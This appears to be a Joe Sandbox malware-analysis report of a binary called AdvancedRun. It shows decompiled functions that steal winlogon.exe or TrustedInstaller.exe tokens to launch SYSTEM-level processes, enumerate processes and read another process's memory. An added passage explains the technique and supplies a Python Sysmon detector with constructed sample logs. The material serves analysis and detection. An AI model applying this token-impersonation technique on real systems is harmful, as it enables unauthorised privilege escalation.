                                                                  				int _t154;
                                                                  				void* _t155;
                                                                  				long _t160;
                                                                  
                                                                  				_t145 = __edx;
                                                                  				_t152 = __ecx;
                                                                  				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                  				_v12 = 0;
                                                                  				if(_t131 != 4) {
                                                                  					__eflags = _t131 - 5;
                                                                  					if(_t131 != 5) {
                                                                  						__eflags = _t131 - 9;
                                                                  						if(__eflags != 0) {
                                                                  							__eflags = _t131 - 8;
                                                                  							if(_t131 != 8) {
                                                                  								__eflags = _t131 - 6;
                                                                  								if(_t131 != 6) {
                                                                  									__eflags = _t131 - 7;
                                                                  									if(_t131 != 7) {
                                                                  										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                  									} else {
                                                                  										_t132 = __eax + 0x46b6;
                                                                  										_t148 = __eax + 0x48b6;
                                                                  										__eflags =  *_t148;
                                                                  										_v16 = _t132;
                                                                  										_v8 = __eax + 0x4ab6;
                                                                  										if( *_t148 == 0) {
                                                                  											_t88 = wcschr(_t132, 0x40);
                                                                  											__eflags = _t88;
                                                                  											if(_t88 != 0) {
                                                                  												_t148 = 0;
                                                                  												__eflags = 0;
                                                                  											}
                                                                  										}
                                                                  										_t153 = _t152 + 0x800;
                                                                  										E0040289F(_t153);
                                                                  										_t154 =  *(_t153 + 0xc);
                                                                  										__eflags = _t154;
                                                                  										if(_t154 == 0) {
                                                                  											_t87 = 0;
                                                                  											__eflags = 0;
                                                                  										} else {
                                                                  											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                  										}
                                                                  										__eflags = _t87;
                                                                  									}
                                                                  									if(__eflags == 0) {
                                                                  										_t84 = GetLastError();
                                                                  										L43:
                                                                  										_v12 = _t84;
                                                                  									}
                                                                  									goto L44;
                                                                  								}
                                                                  								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                  								if(__eflags == 0) {
                                                                  									goto L44;
                                                                  								}
                                                                  								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                  								__eflags = _t92;
                                                                  								if(_t92 != 0) {
                                                                  									goto L44;
                                                                  								}
                                                                  								_t84 = _a28;
                                                                  								goto L43;
                                                                  							}
                                                                  							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                  							__eflags = _t93;
                                                                  							if(_t93 != 0) {
                                                                  								E00401306(_t93); // executed
                                                                  							}
                                                                  							_v8 = 0;
                                                                  							_t94 = E00401F04(_t145, _t152); // executed
                                                                  							__eflags = _t94;
                                                                  							_v12 = _t94;
                                                                  							if(__eflags == 0) {
                                                                  								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                  								__eflags = _t96;
                                                                  								_v12 = _t96;
                                                                  								if(_t96 == 0) {
                                                                  									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                  									__eflags = _t99;
                                                                  									if(_t99 == 0) {
                                                                  										_v12 = GetLastError();
                                                                  									}
                                                                  									CloseHandle(_v8); // executed
                                                                  								}
                                                                  								RevertToSelf(); // executed
                                                                  							}
                                                                  							goto L44;
                                                                  						}
                                                                  						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                  						__eflags = _t104;
                                                                  						if(_t104 == 0) {
                                                                  							goto L44;
                                                                  						}
                                                                  						_v8 = 0;
                                                                  						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                  						goto L14;
                                                                  					}
                                                                  					_t149 = __eax + 0x44ac;
                                                                  					_t110 = wcslen(_t149);
                                                                  					__eflags = _t110;
                                                                  					if(_t110 <= 0) {
                                                                  						goto L44;
                                                                  					} else {
                                                                  						_v8 = 0;
                                                                  						__eflags = E00404EA9(_t149, _t110);
                                                                  						_t112 =  &_v8;
                                                                  						_push(_t112);
                                                                  						_push(_t149);
                                                                  						if(__eflags == 0) {
                                                                  							_push(_t152);
                                                                  							_t113 = E00401DF9(_t145, __eflags);
                                                                  						} else {
                                                                  							L0040B1F8();
                                                                  							_push(_t112);
                                                                  							_push(_t152);
                                                                  							_t113 = E00401E44();
                                                                  						}
                                                                  						_v12 = _t113;
                                                                  						__eflags = _t113;
                                                                  						goto L15;
                                                                  					}
                                                                  				} else {
                                                                  					_v548 = 0;
                                                                  					memset( &_v546, 0, 0x208);
                                                                  					_v1076 = 0;
                                                                  					memset( &_v1074, 0, 0x208);
                                                                  					E00404C3C( &_v548);
                                                                  					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                  					_t151 = wcslen(??);
                                                                  					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                  					_t159 = _t151 + _t10 - 0x104;
                                                                  					if(_t151 + _t10 >= 0x104) {
                                                                  						_v1076 = 0;
                                                                  					} else {
                                                                  						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                  					}
                                                                  					_v8 = 0;
                                                                  					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                  					L14:
                                                                  					_t160 = _t105;
                                                                  					_v12 = _t105;
                                                                  					L15:
                                                                  					if(_t160 == 0) {
                                                                  						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                  							_v12 = GetLastError();
                                                                  						}
                                                                  						CloseHandle(_v8);
                                                                  					}
                                                                  					L44:
                                                                  					return _v12;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040201D
                                                                  • memset.MSVCRT ref: 00402035
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                  • wcslen.MSVCRT ref: 00402050
                                                                  • wcslen.MSVCRT ref: 0040205F
                                                                  • wcslen.MSVCRT ref: 004020B4
                                                                  • _wtoi.MSVCRT ref: 004020D7
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                  • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                    • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                    • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                    • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                    • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                    • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                  • wcschr.MSVCRT ref: 00402259
                                                                  • CreateProcessW.KERNEL32 ref: 004022B8
                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                  • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                  • API String ID: 3201562063-2355939583
                                                                  • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                  • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                  • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                  • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
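The function above resolves a handle to winlogon.exe or TrustedInstaller.exe (OpenProcess with access mask 0x02000000, MAXIMUM_ALLOWED, in subcalls 00401E44 and 0040598B), opens that process's token with TOKEN_DUPLICATE (OpenProcessToken access 0x2), hands the result to 004028ED together with the caller's CreateProcess-style arguments, and then calls RevertToSelf, i.e. it impersonates a SYSTEM or TrustedInstaller token to start a child process. On an endpoint this access pattern is visible in Sysmon Event ID 10 (ProcessAccess), which records the GrantedAccess mask of every OpenProcess call. The following detector is an added example, not part of the Joe Sandbox report or of the analysed sample; the log lines are constructed to mimic Sysmon key=value output, and the trusted-source allowlist is an assumption to be tuned per environment.

```python
"""Token-theft access detector (added example, not part of the sandbox report).

Flags Sysmon Event ID 10 (ProcessAccess) records in which an untrusted image
opens winlogon.exe or TrustedInstaller.exe with an access mask sufficient for
OpenProcessToken, the pattern seen in the decompiled function above.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Access-mask constants matching the literals in the decompiled code.
MAXIMUM_ALLOWED = 0x02000000            # OpenProcess(0x02000000, ...) on winlogon.exe
PROCESS_QUERY_INFORMATION = 0x00000400  # low bits of the 0x410 mask in E004095FD
TOKEN_DUPLICATE = 0x00000002            # OpenProcessToken(..., 0x2, ...) in E0040598B

# Processes whose primary token carries SYSTEM / TrustedInstaller privileges
# (both names appear as strings in the function above).
HIGH_VALUE_TARGETS = {"winlogon.exe", "trustedinstaller.exe"}

# Assumed allowlist of source directories that legitimately open those
# processes; constructed for this example and to be tuned per environment.
TRUSTED_SOURCE_PREFIXES = ("c:\\windows\\system32\\", "c:\\program files\\edr\\")

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass(frozen=True)
class Finding:
    source: str
    target: str
    granted: int
    reason: str


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value Key="Value with spaces"' record into a dict."""
    return {k: v.strip('"') for k, v in _KV.findall(line)}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[Finding]:
    """Flag a ProcessAccess event that could precede OpenProcessToken on a target."""
    if event.get("EventID") != "10":
        return None
    source = event.get("SourceImage", "")
    target = event.get("TargetImage", "")
    granted = int(event.get("GrantedAccess", "0"), 16)
    if _basename(target) not in HIGH_VALUE_TARGETS:
        return None
    if source.lower().startswith(TRUSTED_SOURCE_PREFIXES):
        return None
    if granted & MAXIMUM_ALLOWED:
        return Finding(source, target, granted, "MAXIMUM_ALLOWED on token-bearing process")
    if granted & PROCESS_QUERY_INFORMATION:
        # PROCESS_QUERY_INFORMATION is the minimum OpenProcessToken needs.
        return Finding(source, target, granted, "PROCESS_QUERY_INFORMATION on token-bearing process")
    return None


def detect(lines: Iterable[str]) -> List[Finding]:
    """Run classify() over raw log lines, skipping blanks."""
    findings = []
    for line in lines:
        if line.strip():
            f = classify(parse_event(line))
            if f:
                findings.append(f)
    return findings


# Constructed Sysmon-style sample; not real telemetry from the analysed sample.
SAMPLE_LOG = r"""
EventID=10 SourceImage=C:\Users\bob\Desktop\covid.exe TargetImage=C:\Windows\System32\winlogon.exe GrantedAccess=0x2000000
EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\winlogon.exe GrantedAccess=0x2000000
EventID=10 SourceImage=C:\Users\bob\Desktop\covid.exe TargetImage=C:\Windows\servicing\TrustedInstaller.exe GrantedAccess=0x2000000
EventID=10 SourceImage="C:\Program Files\EDR\agent.exe" TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410
EventID=10 SourceImage=C:\Users\bob\Desktop\covid.exe TargetImage=C:\Windows\explorer.exe GrantedAccess=0x410
EventID=10 SourceImage=C:\Users\bob\Desktop\covid.exe TargetImage=C:\Windows\System32\winlogon.exe GrantedAccess=0x1000
EventID=1 Image=C:\Users\bob\Desktop\covid.exe ParentImage=C:\Windows\explorer.exe
"""

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG.splitlines()):
        print(f"{f.source} -> {f.target} (0x{f.granted:x}): {f.reason}")
```

On the constructed sample only the two opens issued by covid.exe against winlogon.exe and TrustedInstaller.exe are reported; the svchost.exe open is suppressed by the allowlist, the lsass.exe open is out of scope for this rule, and the 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) open is not enough for OpenProcessToken on its own. A MAXIMUM_ALLOWED handle from a user-writable path is the strongest signal here; the PROCESS_QUERY_INFORMATION rule is noisier and is best correlated with a subsequent process creation whose token differs from the parent's.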

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 93%
                                                                  			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                  				void* _v8;
                                                                  				void* _v12;
                                                                  				char _v16;
                                                                  				char _v24;
                                                                  				char _v32;
                                                                  				char _v40;
                                                                  				char _v48;
                                                                  				intOrPtr _v52;
                                                                  				char _v576;
                                                                  				long _v580;
                                                                  				intOrPtr _v1112;
                                                                  				long _v1128;
                                                                  				void _v1132;
                                                                  				void* _v1136;
                                                                  				void _v1658;
                                                                  				char _v1660;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t41;
                                                                  				long _t49;
                                                                  				void* _t50;
                                                                  				intOrPtr* _t66;
                                                                  				struct HINSTANCE__* _t68;
                                                                  				void* _t71;
                                                                  				void* _t83;
                                                                  				void* _t84;
                                                                  				void* _t85;
                                                                  
                                                                  				_t78 = _a4;
                                                                  				E004099D4(_a4 + 0x28);
                                                                  				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                  				_v12 = _t41;
                                                                  				memset( &_v1132, 0, 0x228);
                                                                  				_t84 = _t83 + 0xc;
                                                                  				_v1136 = 0x22c;
                                                                  				Process32FirstW(_v12,  &_v1136); // executed
                                                                  				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                  					E004090AF( &_v580);
                                                                  					_t49 = _v1128;
                                                                  					_v580 = _t49;
                                                                  					_v52 = _v1112;
                                                                  					_t50 = OpenProcess(0x410, 0, _t49);
                                                                  					_v8 = _t50;
                                                                  					if(_t50 != 0) {
                                                                  						L4:
                                                                  						_v1660 = 0;
                                                                  						memset( &_v1658, 0, 0x208);
                                                                  						_t85 = _t84 + 0xc;
                                                                  						E004098F9(_t78, _v8,  &_v1660);
                                                                  						if(_v1660 != 0) {
                                                                  							L10:
                                                                  							E0040920A( &_v576,  &_v1660);
                                                                  							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                  							_t84 = _t85 + 0x14;
                                                                  							CloseHandle(_v8);
                                                                  							_t78 = _a4;
                                                                  							L11:
                                                                  							E004099ED(_t78 + 0x28,  &_v580);
                                                                  							continue;
                                                                  						}
                                                                  						_v16 = 0x104;
                                                                  						if( *0x41c8e0 == 0) {
                                                                  							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                  							if(_t68 != 0) {
                                                                  								 *0x41c8e0 = 1;
                                                                  								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                  							}
                                                                  						}
                                                                  						_t66 =  *0x41c8e4;
                                                                  						if(_t66 != 0) {
                                                                  							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                  						}
                                                                  						goto L10;
                                                                  					}
                                                                  					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                  						goto L11;
                                                                  					}
                                                                  					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                  					_v8 = _t71;
                                                                  					if(_t71 == 0) {
                                                                  						goto L11;
                                                                  					}
                                                                  					goto L4;
                                                                  				}
                                                                  				return CloseHandle(_v12);
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                  • memset.MSVCRT ref: 0040962E
                                                                  • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                  • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                  • memset.MSVCRT ref: 004096C6
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                  • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                  • API String ID: 239888749-1740548384
                                                                  • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                  • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                  • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                  • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 313 409921-409924 314 409926-40992c call 405436 313->314 315 409977 313->315 317 409931-409976 GetProcAddress * 5 314->317 317->315
                                                                  C-Code - Quality: 100%
                                                                  			E00409921(struct HINSTANCE__** __esi) {
                                                                  				void* _t6;
                                                                  				struct HINSTANCE__* _t7;
                                                                  				_Unknown_base(*)()* _t12;
                                                                  				CHAR* _t13;
                                                                  				intOrPtr* _t17;
                                                                  
                                                                  				if( *__esi == 0) {
                                                                  					_t7 = E00405436(L"psapi.dll"); // executed
                                                                  					 *_t17 = "GetModuleBaseNameW";
                                                                  					 *__esi = _t7;
                                                                  					__esi[1] = GetProcAddress(_t7, _t13);
                                                                  					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                  					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                  					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                  					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                  					__esi[3] = _t12;
                                                                  					return _t12;
                                                                  				}
                                                                  				return _t6;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                  • API String ID: 1529661771-70141382
                                                                  • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                  • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                  • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                  • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 318 40b2c6-40b2e0 call 40b4d4 GetModuleHandleA 321 40b301-40b304 318->321 322 40b2e2-40b2ed 318->322 324 40b32d-40b37c __set_app_type __p__fmode __p__commode call 4070dc 321->324 322->321 323 40b2ef-40b2f8 322->323 326 40b319-40b31d 323->326 327 40b2fa-40b2ff 323->327 331 40b38a-40b3e0 call 40b4c2 _initterm __wgetmainargs _initterm 324->331 332 40b37e-40b389 __setusermatherr 324->332 326->321 330 40b31f-40b321 326->330 327->321 329 40b306-40b30d 327->329 329->321 333 40b30f-40b317 329->333 334 40b327-40b32a 330->334 337 40b3f0-40b3f7 331->337 338 40b3e2-40b3eb 331->338 332->331 333->334 334->324 340 40b3f9-40b404 337->340 341 40b43e-40b442 337->341 339 40b4aa-40b4af call 40b50d 338->339 344 40b406-40b40a 340->344 345 40b40c-40b410 340->345 342 40b444-40b449 341->342 343 40b417-40b41d 341->343 342->341 349 40b425-40b436 GetStartupInfoW 343->349 350 40b41f-40b423 343->350 344->340 344->345 345->343 347 40b412-40b414 345->347 347->343 351 40b438-40b43c 349->351 352 40b44b-40b44d 349->352 350->347 350->349 353 40b44e-40b466 GetModuleHandleA call 408533 351->353 352->353 356 40b468-40b469 exit 353->356 357 40b46f-40b4a8 _cexit 353->357 356->357 357->339
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                  • String ID:
                                                                  • API String ID: 2827331108-0
                                                                  • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                  • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                  • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                  • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 80%
                                                                  			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                  				long _v8;
                                                                  				int _v12;
                                                                  				intOrPtr _v16;
                                                                  				int _v20;
                                                                  				int _v24;
                                                                  				char _v28;
                                                                  				void _v538;
                                                                  				char _v540;
                                                                  				int _v548;
                                                                  				char _v564;
                                                                  				char _v22292;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t37;
                                                                  				int _t43;
                                                                  				int _t45;
                                                                  				void* _t48;
                                                                  				void* _t56;
                                                                  				signed int _t57;
                                                                  				long _t61;
                                                                  				void* _t67;
                                                                  				long _t69;
                                                                  				void* _t70;
                                                                  				void* _t72;
                                                                  				void* _t74;
                                                                  				void* _t76;
                                                                  
                                                                  				_t67 = __edx;
                                                                  				E0040B550(0x5714, __ecx);
                                                                  				_t37 = OpenProcess(0x10, 0, _a16);
                                                                  				_t82 = _t37;
                                                                  				_a16 = _t37;
                                                                  				if(_t37 == 0) {
                                                                  					_t69 = GetLastError();
                                                                  				} else {
                                                                  					_t72 =  &_v22292;
                                                                  					E0040171F(_t72, _t82);
                                                                  					_v8 = 0;
                                                                  					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
                                                                  					if(_t43 == 0) {
                                                                  						_t69 = GetLastError();
                                                                  					} else {
                                                                  						_t48 = E00405642( &_v564);
                                                                  						_t74 = _v548;
                                                                  						_t70 = _t48;
                                                                  						_a12 = _t74;
                                                                  						_v540 = 0;
                                                                  						memset( &_v538, 0, 0x1fe);
                                                                  						asm("cdq");
                                                                  						_push(_t67);
                                                                  						_push(_t74);
                                                                  						_push(_t70);
                                                                  						_push(L"%d  %I64x");
                                                                  						_push(0xff);
                                                                  						_push( &_v540);
                                                                  						L0040B1EC();
                                                                  						_v548 = 0;
                                                                  						E004055D1( &_v540,  &_v564);
                                                                  						_t16 = _t70 + 0xa; // 0xa
                                                                  						_t68 = _t16;
                                                                  						_v24 = 0;
                                                                  						_v12 = 0;
                                                                  						_v20 = 0;
                                                                  						_v16 = 0x100;
                                                                  						_v28 = 0;
                                                                  						E0040559A( &_v28, _t16);
                                                                  						_t76 = _v12;
                                                                  						_t56 = 0x40c4e8;
                                                                  						if(_t76 != 0) {
                                                                  							_t56 = _t76;
                                                                  						}
                                                                  						_t26 = _t70 + 2; // 0x2
                                                                  						_t66 = _t70 + _t26;
                                                                  						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
                                                                  						_t85 = _t76;
                                                                  						if(_t76 == 0) {
                                                                  							_t76 = 0x40c4e8;
                                                                  						}
                                                                  						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                  						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
                                                                  						_t69 = _t61;
                                                                  						E004055D1(_t61,  &_v28);
                                                                  					}
                                                                  					_t45 = FindCloseChangeNotification(_a16); // executed
                                                                  					E004055D1(_t45,  &_v564);
                                                                  				}
                                                                  				return _t69;
                                                                  			}

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                  • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                  • memset.MSVCRT ref: 00401B4A
                                                                  • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                  • _snwprintf.MSVCRT ref: 00401B69
                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
